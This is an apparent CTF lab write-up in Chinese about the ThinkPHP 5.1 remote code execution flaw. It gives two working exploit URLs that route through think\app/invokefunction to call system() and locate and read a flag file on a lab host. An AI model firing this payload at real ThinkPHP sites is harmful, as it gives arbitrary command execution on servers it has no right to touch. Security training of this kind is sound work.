ThinkPHP5框架漏洞
PHP_RCE
【实验原理】
ThinkPHP5框架底层对控制器名过滤不严,可以通过url调用到ThinkPHP框架内部的敏感函数,进而导致getshell漏洞。
【实验目的】
掌握框架漏洞
【实验环境】
Windows
【实验工具】
firefox
【实验步骤】
1.根据主页提示,可以发现网页使用的是ThinkPHP框架,版本为5.1
2.此版本存在getshell漏洞(百度一下poc一抓一大把)
3.查找flag
http://192.168.100.161:54064/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find%20/%20-name%20%22flag%22
4.查看flag,如图所示
http://192.168.100.161:54064/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag
赞 (0)